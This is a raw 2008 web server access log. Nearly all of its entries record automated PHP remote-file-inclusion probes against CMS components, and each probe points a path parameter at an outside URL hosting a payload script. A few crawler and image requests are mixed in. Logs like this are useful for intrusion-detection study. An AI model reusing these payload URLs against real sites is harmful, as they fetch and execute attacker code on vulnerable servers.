200.87.129.138 - - [22/Sep/2008:09:00:11 -0700] "GET /logs/access_071223.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:00:20 -0700] "GET /logs/access_080820.log//modules/public/calendar.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:00:21 -0700] "GET /logs/access_080515.log//?name=PNphpBB2http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:00:21 -0700] "GET /logs//?name=PNphpBB2http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 200 66168 "-" "libwww-perl/5.79" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:00:21 -0700] "GET //modules/public/calendar.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:00:22 -0700] "GET //?name=PNphpBB2http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.79" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:00:22 -0700] "GET /logs//modules/public/calendar.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:00:22 -0700] "GET /logs/access_080714.log//modules/public/calendar.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:00:23 -0700] "GET /logs/access_080502.log//?name=PNphpBB2http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:09:00:52 -0700] "GET /logs/access_080524.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://adrenalintravel.ru/images/products/thumbs/comberan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:00:59 -0700] "GET /logs/access_080807.log//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:00:59 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:01:00 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:01:15 -0700] "GET /logs/access_080807.log//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:01:16 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:01:17 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.73.191.120 - - [22/Sep/2008:09:01:22 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.191.120 - - [22/Sep/2008:09:01:22 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.191.120 - - [22/Sep/2008:09:01:22 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:09:01:27 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/ HTTP/1.0" 200 14161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:01:52 -0700] "GET /logs/access_080227.log//poll/png.php?include_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.123.216.231 - - [22/Sep/2008:09:01:56 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.63.5 - - [22/Sep/2008:09:01:56 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [22/Sep/2008:09:01:57 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [22/Sep/2008:09:01:57 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:01:58 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:01:58 -0700] "GET //poll/png.php?include_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:01:59 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:02:00 -0700] "GET /logs//poll/png.php?include_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.48.60 - - [22/Sep/2008:09:02:01 -0700] "GET /logs//?module_root_path=http://www.transfaires.net/numb/id.txt?? HTTP/1.1" 200 66168 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.48.60 - - [22/Sep/2008:09:02:02 -0700] "GET //?module_root_path=http://www.transfaires.net/numb/id.txt?? HTTP/1.1" 200 94772 "-" "libwww-perl/5.810" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:02:03 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:02:04 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:02:07 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:09:02:07 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:02:09 -0700] "GET /logs/access_080807.log//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:02:09 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:02:10 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:02:13 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:09:02:14 -0700] "GET /logs/access_080815.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:02:14 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:02:22 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.31 - - [22/Sep/2008:09:02:23 -0700] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:02:23 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [22/Sep/2008:09:02:31 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://bghk.net/ppb2/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:02:46 -0700] "GET /logs/access_080524.log//administrator/index.php?option=com_mgm=&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [22/Sep/2008:09:03:00 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [22/Sep/2008:09:03:00 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:03:08 -0700] "GET /logs/access_080524.log%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:03:08 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:03:08 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.63.5 - - [22/Sep/2008:09:03:20 -0700] "GET /logs/access_080904.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:09:03:24 -0700] "GET /logs/access_080815.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:09:03:32 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:03:35 -0700] "GET /logs/access_080419.log//?name=PNphpBB2http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.245.90 - - [22/Sep/2008:09:04:27 -0700] "GET /logs/access_080807.log/index.php?menu=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.186.117.208 - - [22/Sep/2008:09:04:50 -0700] "GET /logs/access_071129.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [22/Sep/2008:09:04:51 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [22/Sep/2008:09:04:51 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:09:04:59 -0700] "GET /logs/access_071222.log//components/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:09:05:00 -0700] "GET //components/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:09:05:00 -0700] "GET /logs//components/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:09:05:00 -0700] "GET /logs/access_080502.log//components/errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.136.63.5 - - [22/Sep/2008:09:05:08 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [22/Sep/2008:09:05:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:05:18 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:05:52 -0700] "GET /logs/access_080801.log//include/lib.inc.php?site_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:05:52 -0700] "GET //include/lib.inc.php?site_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:05:52 -0700] "GET /logs//include/lib.inc.php?site_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:06:16 -0700] "GET /logs/access_080724.log//include/lib.inc.php?site_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:09:07:12 -0700] "GET /logs/access_080815.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.208.43.121 - - [22/Sep/2008:09:07:13 -0700] "GET /logs/access_080803.log//components/com_simpleboard/image_upload.php?sbp=http://www.citoyennete-active.org/mambots/content/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [22/Sep/2008:09:07:27 -0700] "GET /logs/access_080725.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:07:43 -0700] "GET /logs/access_080803.log//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:08:01 -0700] "GET /logs/access_080803.log//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:09:08:02 -0700] "GET /logs/access_080315.log/errors.php?error=http://adrenalintravel.ru/images/products/thumbs/comberan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:09:08:02 -0700] "GET /logs/access_080809.log/errors.php?error=http://adrenalintravel.ru/images/products/thumbs/comberan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:09:08:02 -0700] "GET /errors.php?error=http://adrenalintravel.ru/images/products/thumbs/comberan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:09:08:02 -0700] "GET /logs/errors.php?error=http://adrenalintravel.ru/images/products/thumbs/comberan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:09:08:10 -0700] "GET /logs/access_080321.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:09:08:33 -0700] "GET /logs/access_080803.log//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:09:09:04 -0700] "GET /logs/access_080815.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:09:16 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:09:16 -0700] "GET /logs/access_080209.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:09:17 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:09:21 -0700] "GET //include/lib.inc.php?site_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:09:28 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:09:28 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:09:37 -0700] "GET /logs/access_080209.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:09:37 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:09:40 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:09:43 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.148.187.197 - - [22/Sep/2008:09:09:52 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.148.187.197 - - [22/Sep/2008:09:09:52 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.148.187.197 - - [22/Sep/2008:09:09:52 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.148.187.197 - - [22/Sep/2008:09:10:02 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:10:05 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.45.184.18 - - [22/Sep/2008:09:10:05 -0700] "GET /logs/access_080524.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://l0calh0st.100webspace.net/osi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
198.253.49.6 - - [22/Sep/2008:09:10:09 -0700] "GET /bikes/dteel/2008_09_21/Rides418s.jpg HTTP/1.1" 200 238378 "http://www.st-owners.com/forums/showthread.php?t=42795&page=6" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
198.253.49.6 - - [22/Sep/2008:09:10:09 -0700] "GET /bikes/dteel/2008_09_21/Rides413s.jpg HTTP/1.1" 200 313821 "http://www.st-owners.com/forums/showthread.php?t=42795&page=6" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)" "www.dmulk.com"
67.18.166.178 - - [22/Sep/2008:09:10:18 -0700] "GET /logs/access_080524.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:10:49 -0700] "GET /logs/access_080807.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.170.196.15 - - [22/Sep/2008:09:10:49 -0700] "GET /logs/access_080902.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:11:03 -0700] "GET /logs/access_080629.log/show.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:11:03 -0700] "GET /logs/show.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:11:03 -0700] "GET /logs/access_080602.log/show.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:11:03 -0700] "GET /show.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:11:06 -0700] "GET /logs/access_080408.log/pages.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:11:06 -0700] "GET /pages.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:11:06 -0700] "GET /logs/pages.php?page=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.7.214 - - [22/Sep/2008:09:11:24 -0700] "GET /logs/access_080512.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.7.214 - - [22/Sep/2008:09:11:29 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 95296 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.7.214 - - [22/Sep/2008:09:11:29 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
